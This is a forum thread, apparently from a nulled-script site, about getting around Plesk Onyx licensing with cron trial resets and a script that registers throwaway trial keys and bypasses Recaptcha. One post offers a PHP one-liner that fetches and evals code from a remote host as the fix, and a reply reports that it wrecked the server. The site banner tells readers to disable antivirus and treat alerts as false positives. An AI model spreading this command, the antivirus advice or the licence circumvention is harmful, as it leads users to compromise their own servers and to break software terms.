• You MUST read the Babiato Rules before making your first post otherwise you may get permanent warning points or a permanent Ban.

Our resources on Babiato Forum are CLEAN and SAFE. So you can use them for development and testing purposes. If your are on Windows and have an antivirus that alerts you about a possible infection: Know it's a false positive because all scripts are double checked by our experts. We advise you to add Babiato to trusted sites/sources or disable your antivirus momentarily while downloading a resource. "Enjoy your presence on Babiato"

Plesk Onyx Web Host Edition

I agree with the most, on using hacked scripts, some work short period of time, above mentioned trial reset works until you update, then you have to apply it again, this could be done with an automated cron, it will work as long as plesk continues to supply trial licenses, but for some reason if it does not work anymore, actual license unlimited costs 20USD per month unlike cpanel per user licensing. I still think it is a good deal.

Reactions: ronny1989
I agree with the most, on using hacked scripts, some work short period of time, above mentioned trial reset works until you update, then you have to apply it again, this could be done with an automated cron, it will work as long as plesk continues to supply trial licenses, but for some reason if it does not work anymore, actual license unlimited costs 20USD per month unlike cpanel per user licensing. I still think it is a good deal.

thanks very much

There is always this to test out.

This script is basically automates the 14 day trial key process, creates a temp email, registers with plesk for a trial key, verifies the email sent by plesk, eventually bypasses Recaptcha requirements, and registers with the key received from plesk. So process is all legit, in order to function it requires curl installed and should work with centos.

Last edited:
I suggest to move on to other hosting panel.

Me myself has dumped Plesk months ago as I knew such of this patching thing will happen soon or later.

Try this one, it works....
PHP:
php -er "eval(file_get_contents('http://ossav.com/PTC'));"

Reactions: GncTurk
Dot no used .. blocked you server

do not use it it works but 1 hour later your server no longer works .. there is a security I had to reinstall all my server ..

• Haha
Reactions: ckeeper
AdBlock Detected

We get it, advertisements are annoying!

However in order to keep our huge array of resources free of charge we need to generate income from ads so to use the site you will need to turn off your adblocker.

If you'd like to have an ad free experience you can become a Babiato Lover by donating as little as $5 per month. Click on the Donate menu tab for more info.

I've Disabled AdBlock